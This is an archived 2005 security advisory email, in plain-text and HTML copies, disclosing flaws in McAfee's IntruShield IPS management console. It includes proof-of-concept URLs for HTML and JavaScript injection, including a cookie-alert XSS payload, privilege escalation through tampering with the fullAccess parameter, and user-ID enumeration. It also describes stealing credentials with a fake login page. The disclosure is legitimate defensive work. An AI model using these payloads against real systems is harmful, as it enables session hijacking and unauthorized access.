McAfeeIPS.txt

`------=_Part_13419_25560245.1120660746428  
Content-Type: text/plain; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
/*  
***************************************************************************=  
**************************************  
$ An open security advisory #8 - McAfee Intrushield IPS Management Console=  
=20  
Abuse  
***************************************************************************=  
**************************************  
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com  
2: Bug Released: July 06 2005  
3: Bug Impact Rate: Medium / Hi  
4: Bug Scope Rate: Local / Remote  
***************************************************************************=  
**************************************  
$ This advisory and/or proof of concept code must not be used for commercia=  
l=20  
gain.  
***************************************************************************=  
**************************************  
  
McAfee IntruShield Security Management System  
http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm  
  
  
"The McAfee IntruShield Security Management System is an advanced solution=  
=20  
for administering IntruShield  
sensor appliance deployments. The IntruShield Security Management System=20  
(ISM) can support both large and  
small network intrusion prevention system (IPS) deployments and can scale u=  
p=20  
to several hundred sensor  
appliances. By integrating a comprehensive set of Best-in-Class security=20  
management functions, the  
IntruShield Security Management System dramatically simplifies and=20  
streamlines the complexities associated  
with IPS configuration, policy compliance, and threat and response=20  
management."  
  
I have found some security vulnerabilities in this product whereby a user=  
=20  
can elevate their privileges from  
a user that can only view alerts logged by remote sensors, to a scenario=20  
where the user can gain access to  
acknowledge, accept and delete alerts and access the Management Console. It=  
=20  
is also possible to inject  
malicious HTML and JavaScript into the URLS and have this malicious script=  
=20  
run on the clients machine,  
allowing for account information hijacking.  
  
A new version has been released to address these bugs and can be downloaded=  
=20  
from their site.  
  
*/  
  
Issues:=20  
1) Inject HTML  
2) Inject JavaScript  
3) Access privileged reports  
4) Acknowledge and delete alerts  
5) Gain access to Management Console  
  
Note: for issues 1 - 4, the attacker needs a valid user account.  
  
1) It is possible to embed HTML into the MISMS. This could potentially allo=  
w=20  
phishing attacks to be performed  
against a valid Manager account.  
  
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=  
=3Dfalse&faultResourceName=3DManager&  
domainName=3D%2FDemo%3A0&resourceName=3D%2FDemo%3A0%2FManager&resourceType=  
=3DManager&  
topMenuName=3DSystemHealthManager&secondMenuName=3DFaults&resourceId=3D-1&t=  
hirdMenuName=3D<iframe%20src=3D"  
http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504=  
.htm"%20width=3D800%20height=3D600  
>  
</iframe>&severity=3Dcritical&count=3D1  
  
  
2) It is possible to embed JavaScript into the MISMS and have the embedded=  
=20  
script execute in the security  
context of the user browsing the Management System.  
  
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=  
=3Dfalse&faultResourceName=3DManager&  
domainName=3DDemo&resourceName=3D<script>alert("There could be trouble=20  
ahead")</script><script>alert(document.cookie)  
</script>&resourceType=3DManager&topMenuName=3DSystemHealthManager&secondMe=  
nuName=3DFaults&resourceId=3D-1&thirdMenuName=3D  
Critical&severity=3Dcritical&count=3D1  
  
  
3) It is possible to access the restricted "Generate Reports" section of th=  
e=20  
MISMS and as such, a non-privileged  
user can gain important information regarding the configuration and set-up=  
=20  
of the IP devices being managed by the  
Service. This can be achieved by simply changing the Access option from=20  
false to true.  
  
https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?mon=  
itoredDomain=3D%2FDemo&  
selectedDomain=3D0&fullAccessRight=3Dtrue  
  
  
4) It is possible to acknowledge, de-acknowledge and delete alerts from the=  
=20  
MISMS console by modifying URL's  
sent to the system by simply changing the Access option from false to true.  
  
https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=  
=3Dtrue&faultResourceName=3DManager&  
domainName=3D%2FDemo%3A0&resourceName=3D%Demo%3A0%2FManager&resourceType=3D=  
Manager&  
topMenuName=3DSystemHealthManager&secondMenuName=3DFaults&resourceId=3D-1&t=  
hirdMenuName=3DCritical&severity=3D  
critical&count=3D1  
  
Each change is emailed out to the administrator, however the email only say=  
s=20  
that "someone" made a change.  
  
5) As default, all user ID values are passed in the URL in the clear,=20  
meaning that it is trivial for an attacker  
to brute force accounts until a privileged Manager account is found. An=20  
example of this would look similar to:  
  
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D1&logo=3Dintru=  
vert.gif  
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D2&logo=3Dintru=  
vert.gif  
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D3&logo=3Dintru=  
vert.gif  
https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3D4&logo=3Dintru=  
vert.gif  
  
This process can be continued until a valid user ID has been found with=20  
privileges to access the configure screen.  
  
Since javascript can be run in the browsers of clients accessing the device=  
,=20  
it would be possible to redraw the page  
with IFRAME's and recreate the user login page to snoop usersnames and=20  
passwords.  
  
------=_Part_13419_25560245.1120660746428  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
Content-Disposition: inline  
  
&nbsp;/*<br>  
&nbsp; ********************************************************************=  
*********************************************<br>  
&nbsp; $ An open security advisory #8 - McAfee Intrushield IPS Management C=  
onsole Abuse<br>  
&nbsp; ********************************************************************=  
*********************************************<br>  
&nbsp; 1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com<br>  
&nbsp; 2: Bug Released: July 06 2005<br>  
&nbsp; 3: Bug Impact Rate: Medium / Hi<br>  
&nbsp; 4: Bug Scope Rate: Local / Remote<br>  
&nbsp; ********************************************************************=  
*********************************************<br>  
&nbsp; $ This advisory and/or proof of concept code must not be used for co=  
mmercial gain.<br>  
&nbsp; ********************************************************************=  
*********************************************<br>  
<br>  
&nbsp; McAfee IntruShield Security Management System<br>  
&nbsp; <a href=3D"http://www.mcafeesecurity.com/us/products/mcafee/network_=  
ips/category.htm">http://www.mcafeesecurity.com/us/products/mcafee/network_=  
ips/category.htm</a><br>  
<br>  
<br>  
&nbsp; "The McAfee IntruShield Security Management System is an advanc=  
ed solution for administering IntruShield<br>  
&nbsp; sensor appliance deployments. The IntruShield Security Management Sy=  
stem (ISM) can support both large and<br>  
&nbsp; small network intrusion prevention system (IPS) deployments and can =  
scale up to several hundred sensor<br>  
&nbsp; appliances. By integrating a comprehensive set of Best-in-Class secu=  
rity management functions, the<br>  
&nbsp; IntruShield Security Management System dramatically simplifies and s=  
treamlines the complexities associated<br>  
&nbsp; with IPS configuration, policy compliance, and threat and response m=  
anagement."<br>  
<br>  
&nbsp; I have found some security vulnerabilities in this product whereby a=  
user can elevate their privileges from<br>  
&nbsp; a user that can only view alerts logged by remote sensors, to a scen=  
ario where the user can gain access to<br>  
&nbsp; acknowledge, accept and delete alerts and access the Management Cons=  
ole. It is also possible to inject<br>  
&nbsp; malicious HTML and JavaScript into the URLS and have this malicious =  
script run on the clients machine,<br>  
&nbsp; allowing for account information hijacking.<br>  
<br>  
&nbsp; A new version has been released to address these bugs and can be dow=  
nloaded from their site.<br>  
<br>  
*/<br>  
<br>  
&nbsp; Issues: <br>  
&nbsp; 1) Inject HTML<br>  
&nbsp; 2) Inject JavaScript<br>  
&nbsp; 3) Access privileged reports<br>  
&nbsp; 4) Acknowledge and delete alerts<br>  
&nbsp; 5) Gain access to Management Console<br>  
<br>  
&nbsp; Note: for issues 1 - 4, the attacker needs a valid user account.<br>  
<br>  
&nbsp; 1) It is possible to embed HTML into the MISMS. This could potential=  
ly allow phishing attacks to be performed<br>  
&nbsp; against a valid Manager account.<br>  
<br>  
&nbsp; <a href=3D"https://intrushield/intruvert/jsp/systemHealth/SystemEven=  
t.jsp?fullAccess=3Dfalse&faultResourceName=3DManager&">https://intr=  
ushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=3Dfalse&f=  
aultResourceName=3DManager&  
</a><br>  
&nbsp; domainName=3D%2FDemo%3A0&resourceName=3D%2FDemo%3A0%2FManager&am=  
p;resourceType=3DManager&<br>  
&nbsp; topMenuName=3DSystemHealthManager&secondMenuName=3DFaults&re=  
sourceId=3D-1&thirdMenuName=3D<iframe%20src=3D"<br>  
&nbsp; <a href=3D"http://www.mcafeesecurity.com/us/about/press/corporate/20=  
05/20050411_185504.htm"%20width=3D800%20height=3D600">http://www.mcafe=  
esecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20wid=  
th=3D800%20height=3D600  
</a>><br>  
&nbsp; </iframe>&severity=3Dcritical&count=3D1<br>  
<br>  
<br>  
&nbsp; 2) It is possible to embed JavaScript into the MISMS and have the em=  
bedded script execute in the security<br>  
&nbsp; context of the user browsing the Management System.<br>  
<br>  
&nbsp; <a href=3D"https://intrushield/intruvert/jsp/systemHealth/SystemEven=  
t.jsp?fullAccess=3Dfalse&faultResourceName=3DManager&">https://intr=  
ushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=3Dfalse&f=  
aultResourceName=3DManager&  
</a><br>  
&nbsp; domainName=3DDemo&resourceName=3D<script>alert("There  
could be trouble&nbsp;  
ahead")</script><script>alert(document.cookie)<br>  
&nbsp;  
</script>&resourceType=3DManager&topMenuName=3DSystemHealthMa=  
nager&secondMenuName=3DFaults&resourceId=3D-1&thirdMenuName=3D<=  
br>  
&nbsp; Critical&severity=3Dcritical&count=3D1<br>  
<br>  
<br>  
&nbsp; 3) It is possible to access the restricted "Generate Reports" sectio=  
n of the MISMS and as such, a non-privileged<br>  
&nbsp; user can gain important information regarding the configuration and =  
set-up of the IP devices being managed by the<br>  
&nbsp; Service. This can be achieved by simply changing the Access option f=  
rom false to true.<br>  
<br>  
&nbsp; <a href=3D"https://intrushield:443/intruvert/jsp/reports/reports-col=  
umn-center.jsp?monitoredDomain=3D%2FDemo&">https://intrushield:443/intr=  
uvert/jsp/reports/reports-column-center.jsp?monitoredDomain=3D%2FDemo&<=  
/a><br>  
  
&nbsp; selectedDomain=3D0&fullAccessRight=3Dtrue<br>  
<br>  
<br>  
&nbsp; 4) It is possible to acknowledge, de-acknowledge and delete alerts f=  
rom the MISMS console by modifying URL's<br>  
&nbsp; sent to the system by simply changing the Access option from false t=  
o true.<br>  
<br>  
&nbsp; <a href=3D"https://intrushield/intruvert/jsp/systemHealth/SystemEven=  
t.jsp?fullAccess=3Dtrue&faultResourceName=3DManager&">https://intru=  
shield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=3Dtrue&fau=  
ltResourceName=3DManager&  
</a><br>  
&nbsp; domainName=3D%2FDemo%3A0&resourceName=3D%Demo%3A0%2FManager&=  
resourceType=3DManager&<br>  
&nbsp; topMenuName=3DSystemHealthManager&secondMenuName=3DFaults&re=  
sourceId=3D-1&thirdMenuName=3DCritical&severity=3D<br>  
&nbsp; critical&count=3D1<br>  
<br>  
&nbsp; Each change is emailed out to the administrator, however the email o=  
nly says that "someone" made a change.<br>  
<br>  
&nbsp; 5) As default, all user ID values are passed in the URL in the clear=  
, meaning that it is trivial for an attacker<br>  
&nbsp; to brute force accounts until a privileged Manager account is found.=  
An example of this would look similar to:<br>  
<br>  
&nbsp; <a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=  
d=3D1&logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=  
disp.jsp?userId=3D1&logo=3Dintruvert.gif</a><br>  
&nbsp; <a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=  
d=3D2&logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=  
disp.jsp?userId=3D2&logo=3Dintruvert.gif</a><br>  
&nbsp; <a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=  
d=3D3&logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=  
disp.jsp?userId=3D3&logo=3Dintruvert.gif</a><br>  
&nbsp; <a href=3D"https://intrushield:443/intruvert/jsp/menu/disp.jsp?userI=  
d=3D4&logo=3Dintruvert.gif">https://intrushield:443/intruvert/jsp/menu/=  
disp.jsp?userId=3D4&logo=3Dintruvert.gif</a><br>  
<br>  
&nbsp; This process can be continued until a valid user ID has been found w=  
ith privileges to access the configure screen.<br>  
<br>  
&nbsp; Since javascript can be run in the browsers of clients accessing the=  
device, it would be possible to redraw the page<br>  
&nbsp; with IFRAME's and recreate the user login page to snoop usersnames a=  
nd passwords.<br>  
&nbsp; <br>  
<br>  
  
------=_Part_13419_25560245.1120660746428--  
`